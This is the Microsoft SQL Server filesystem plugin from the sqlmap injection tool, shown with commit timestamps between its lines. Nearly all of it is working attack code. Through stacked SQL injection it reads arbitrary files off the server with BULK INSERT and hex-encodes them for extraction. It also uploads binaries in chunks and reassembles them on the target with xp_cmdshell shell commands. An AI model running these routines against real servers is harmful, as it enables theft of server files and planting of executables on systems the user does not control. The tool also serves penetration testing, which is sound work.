2010-03-23 01:57:57 +03:00
#!/usr/bin/env python
"""
$ Id $
2011-07-08 00:10:03 +04:00
Copyright ( c ) 2006 - 2011 sqlmap developers ( http : / / www . sqlmap . org / )
2010-10-15 03:18:29 +04:00
See the file ' doc/COPYING ' for copying permission
2010-03-23 01:57:57 +03:00
"""
2010-05-29 14:10:28 +04:00
import codecs
2010-04-23 20:34:20 +04:00
import ntpath
2010-03-23 01:57:57 +03:00
import os
from lib . core . common import getRange
2010-12-18 00:45:20 +03:00
from lib . core . common import isNumPosStrValue
2011-01-12 04:13:32 +03:00
from lib . core . common import isTechniqueAvailable
2010-03-23 01:57:57 +03:00
from lib . core . common import posixToNtSlashes
from lib . core . common import randomStr
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
2011-01-15 13:14:05 +03:00
from lib . core . enums import PAYLOAD
2010-03-23 01:57:57 +03:00
from lib . core . exception import sqlmapNoneDataException
from lib . core . exception import sqlmapUnsupportedFeatureException
from lib . request import inject
from plugins . generic . filesystem import Filesystem as GenericFilesystem
class Filesystem ( GenericFilesystem ) :
def __init__ ( self ) :
GenericFilesystem . __init__ ( self )
def unionReadFile ( self , rFile ) :
2011-04-30 17:20:05 +04:00
errMsg = " Microsoft SQL Server does not support file reading "
2010-03-23 01:57:57 +03:00
errMsg + = " with UNION query SQL injection technique "
raise sqlmapUnsupportedFeatureException ( errMsg )
def stackedReadFile ( self , rFile ) :
infoMsg = " fetching file: ' %s ' " % rFile
logger . info ( infoMsg )
result = [ ]
txtTbl = self . fileTblName
hexTbl = " %s hex " % self . fileTblName
self . createSupportTbl ( txtTbl , self . tblField , " text " )
inject . goStacked ( " DROP TABLE %s " % hexTbl )
inject . goStacked ( " CREATE TABLE %s (id INT IDENTITY(1, 1) PRIMARY KEY, %s %s ) " % ( hexTbl , self . tblField , " VARCHAR(4096) " ) )
logger . debug ( " loading the content of file ' %s ' into support table " % rFile )
inject . goStacked ( " BULK INSERT %s FROM ' %s ' WITH (CODEPAGE= ' RAW ' , FIELDTERMINATOR= ' %s ' , ROWTERMINATOR= ' %s ' ) " % ( txtTbl , rFile , randomStr ( 10 ) , randomStr ( 10 ) ) , silent = True )
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """
DECLARE @charset VARCHAR ( 16 )
DECLARE @counter INT
DECLARE @hexstr VARCHAR ( 4096 )
DECLARE @length INT
DECLARE @chunk INT
SET @charset = ' 0123456789ABCDEF '
SET @counter = 1
SET @hexstr = ' '
SET @length = ( SELECT DATALENGTH ( % s ) FROM % s )
SET @chunk = 1024
WHILE ( @counter < = @length )
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT ( INT , ( SELECT ASCII ( SUBSTRING ( % s , @counter , 1 ) ) FROM % s ) )
SET @firstint = floor ( @tempint / 16 )
SET @secondint = @tempint - ( @firstint * 16 )
SET @hexstr = @hexstr + SUBSTRING ( @charset , @firstint + 1 , 1 ) + SUBSTRING ( @charset , @secondint + 1 , 1 )
SET @counter = @counter + 1
IF @counter % % @chunk = 0
BEGIN
INSERT INTO % s ( % s ) VALUES ( @hexstr )
SET @hexstr = ' '
END
END
IF @counter % % ( @chunk ) != 0
BEGIN
INSERT INTO % s ( % s ) VALUES ( @hexstr )
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery . replace ( " " , " " ) . replace ( " \n " , " " )
inject . goStacked ( binToHexQuery )
2011-01-12 04:13:32 +03:00
if isTechniqueAvailable ( PAYLOAD . TECHNIQUE . UNION ) :
2011-12-22 14:32:21 +04:00
result = inject . getValue ( " SELECT %s FROM %s ORDER BY id ASC " % ( self . tblField , hexTbl ) , unique = False , resumeValue = False , blind = False , error = False )
2010-03-23 01:57:57 +03:00
if not result :
result = [ ]
2011-05-03 01:55:06 +04:00
count = inject . getValue ( " SELECT COUNT(*) FROM %s " % ( hexTbl ) , resumeValue = False , charsetType = 2 )
2010-03-23 01:57:57 +03:00
2010-12-18 00:45:20 +03:00
if not isNumPosStrValue ( count ) :
2011-04-30 17:20:05 +04:00
errMsg = " unable to retrieve the content of the "
2010-03-23 01:57:57 +03:00
errMsg + = " file ' %s ' " % rFile
raise sqlmapNoneDataException ( errMsg )
indexRange = getRange ( count )
for index in indexRange :
2011-12-22 14:32:21 +04:00
chunk = inject . getValue ( " SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC " % ( self . tblField , hexTbl , self . tblField , index , self . tblField , hexTbl ) , unpack = False , resumeValue = False , unique = False , charsetType = 3 )
2010-03-23 01:57:57 +03:00
result . append ( chunk )
inject . goStacked ( " DROP TABLE %s " % hexTbl )
return result
def unionWriteFile ( self , wFile , dFile , fileType , confirm = True ) :
2011-04-30 17:20:05 +04:00
errMsg = " Microsoft SQL Server does not support file upload with "
2010-03-23 01:57:57 +03:00
errMsg + = " UNION query SQL injection technique "
raise sqlmapUnsupportedFeatureException ( errMsg )
def stackedWriteFile ( self , wFile , dFile , fileType , confirm = True ) :
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system. Maybe it won't be required to write text files
self . initEnv ( )
self . getRemoteTempPath ( )
2011-04-30 17:20:05 +04:00
debugMsg = " going to use xp_cmdshell extended procedure to write "
2010-03-23 01:57:57 +03:00
debugMsg + = " the %s file content to file ' %s ' " % ( fileType , dFile )
logger . debug ( debugMsg )
2011-04-30 17:20:05 +04:00
debugSize = 0xFF00
tmpPath = posixToNtSlashes ( conf . tmpPath )
dFile = posixToNtSlashes ( dFile )
dFileName = ntpath . basename ( dFile )
wFileSize = os . path . getsize ( wFile )
2010-05-29 14:10:28 +04:00
wFilePointer = codecs . open ( wFile , " rb " )
2010-03-23 01:57:57 +03:00
wFileContent = wFilePointer . read ( )
wFilePointer . close ( )
if wFileSize < debugSize :
chunkName = self . updateBinChunk ( wFileContent , tmpPath )
2011-04-30 17:20:05 +04:00
sFile = " %s \ %s " % ( tmpPath , dFileName )
2010-03-23 01:57:57 +03:00
logger . debug ( " moving binary file %s to %s " % ( sFile , dFile ) )
2010-10-28 04:19:40 +04:00
commands = ( " cd \" %s \" " % tmpPath , " ren %s %s " % ( chunkName , dFileName ) , " move /Y %s %s " % ( dFileName , dFile ) )
complComm = " & " . join ( command for command in commands )
2010-03-23 01:57:57 +03:00
2010-10-28 04:19:40 +04:00
self . execCmd ( complComm )
2010-03-23 01:57:57 +03:00
else :
2011-04-30 17:20:05 +04:00
infoMsg = " the %s file is bigger than %d " % ( fileType , debugSize )
2010-03-23 01:57:57 +03:00
infoMsg + = " bytes. sqlmap will split it into chunks, upload "
infoMsg + = " them and recreate the original file out of the "
2010-12-10 18:28:56 +03:00
infoMsg + = " binary chunks server-side, please wait.. "
2010-03-23 01:57:57 +03:00
logger . info ( infoMsg )
counter = 1
2011-10-22 02:34:27 +04:00
for i in xrange ( 0 , wFileSize , debugSize ) :
2010-03-23 01:57:57 +03:00
wFileChunk = wFileContent [ i : i + debugSize ]
2011-04-30 17:20:05 +04:00
chunkName = self . updateBinChunk ( wFileChunk , tmpPath )
2010-03-23 01:57:57 +03:00
if i == 0 :
infoMsg = " renaming chunk "
copyCmd = " ren %s %s " % ( chunkName , dFileName )
else :
infoMsg = " appending chunk "
copyCmd = " copy /B /Y %s + %s %s " % ( dFileName , chunkName , dFileName )
infoMsg + = " %s \ %s to %s \ %s " % ( tmpPath , chunkName , tmpPath , dFileName )
logger . debug ( infoMsg )
2010-10-28 04:19:40 +04:00
commands = ( " cd %s " % tmpPath , copyCmd , " del /F %s " % chunkName )
complComm = " & " . join ( command for command in commands )
2010-03-23 01:57:57 +03:00
2010-10-28 04:19:40 +04:00
self . execCmd ( complComm )
2010-03-23 01:57:57 +03:00
logger . info ( " file chunk %d written " % counter )
counter + = 1
sFile = " %s \ %s " % ( tmpPath , dFileName )
logger . debug ( " moving binary file %s to %s " % ( sFile , dFile ) )
2010-10-28 04:19:40 +04:00
commands = ( " cd %s " % tmpPath , " move /Y %s %s " % ( dFileName , dFile ) )
2010-03-23 01:57:57 +03:00
complComm = " & " . join ( command for command in commands )
2010-10-28 04:19:40 +04:00
self . execCmd ( complComm )
2010-03-23 01:57:57 +03:00
if confirm :
self . askCheckWrittenFile ( wFile , dFile , fileType )